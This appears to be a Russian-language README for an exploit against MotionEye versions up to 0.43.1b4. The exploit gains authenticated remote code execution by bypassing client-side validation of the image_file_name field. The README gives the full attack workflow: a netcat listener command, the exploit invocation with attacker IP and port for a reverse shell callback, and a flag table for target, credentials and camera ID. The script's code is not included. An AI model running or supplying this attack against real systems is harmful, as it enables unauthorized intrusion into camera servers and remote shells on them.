
Эксплойт для аутентифицированного RCE для MotionEye <= 0.43.1b4 через обход валидации на стороне клиента в поле image_file_name. Включает доставку полезной нагрузки reverse shell.
Аутентифицированное RCE в MotionEye <= 0.43.1b4 через обход проверки на стороне клиента в поле image_file_name.
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| Флаг | Описание |
|---|---|
-t | Целевой хост/URL (по умолчанию порт 8765) |
-u | Имя пользователя (по умолчанию: admin) |
-p | Пароль — то же значение, что вы вводите в GUI / найдено в motion.conf |
-lh | Ваш IP атакующего |
-lp | Порт прослушивателя |
--camera-id | ID камеры (автоматически определяется, если опущен) |